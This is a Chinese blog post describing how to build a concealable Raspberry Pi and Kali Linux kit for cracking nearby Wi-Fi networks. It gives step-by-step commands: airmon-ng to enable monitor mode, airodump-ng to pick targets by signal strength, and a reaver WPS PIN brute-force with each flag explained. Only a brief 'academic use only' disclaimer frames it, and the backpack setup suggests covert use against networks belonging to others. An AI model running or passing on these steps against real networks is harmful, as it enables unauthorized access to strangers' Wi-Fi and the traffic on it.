标签:pin;渗透;8187;3070;kali;linux;树莓派
学术交流使用,小伙伴不用乱用哦
树莓派一个 一个TP 迷你网卡 一个8187L卡皇(某宝老板没有3070了)TF卡一个(8G以上)
3070更小 和 树莓派更般配 或者使用全向天线 这次我用的是定向
使用 tp迷你网卡做ap 一个5V2A的充电宝 一个小书包 放在书包里最好使用全向天线。 用手机连接到树莓派 可以实现某些特殊的渗透
最后后一张放图给大家看
首先去下载 kali linux 地址:https://www.offensive-security.com/kali-linux-vmware-arm-image-download/
用Win32_Disk_Imager 写入 TF卡
将TF卡插入树莓派,接好所有组件再接通电源
使用SSH连接(前提你知道IP,不知道请自行百度,百度都可以找到)
我这台连接了三个网卡 其中 wlan0 是8187L(可以用iwconfig查看到)
使用airmon-ng start 你的网卡名称
在用ifconfig 看一下网卡 网卡的名字变了记住这个新名字 下面在使用的8187L的时候都要用这个新名字
然后使用 airodump-ng wlan0mon 开始监听
(
有可能不能使用,那就重启一下网卡
ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up
)
airodump-ng wlan0mon 开始监听
现在就可以捕获到好多的信号,不要高兴太早,根据上面的airodump搜索到的无线信号,然后可以挑信号强的进行破解(也就是 PWR这一列 的值越小越好)也不是所有的都能跑pin(MB这一列54e. 就有这个“.”才可以去跑pin)现在挑一个信号强的使用REAVER的命令
还有一点:记记住BSSID(就是路由器的MAC) CH(信道,也可以不用) ESSID(wifi的名称,不然你都不知道 你跑的是那个wifi就搞笑了)
当然你要先安装 apt-get install reaver
reaver -i mon0 -b 00:00:00:00:00:00 -a -S -vv -d2 -t 5 -c 11
-i 使用的网卡
-b mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高PJ速度
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间,如果信号不错,可以这样###设置
-c 信道就是 CH的值 可加可不加
下面你要做的就是等TA跑完。。。
全家福
本文出自 “浪漫的偷笑” 博客,转载请与作者联系!
标签:pin;渗透;8187;3070;kali;linux;树莓派
原文地址:http://lmdtx.blog.51cto.com/6942028/1697900
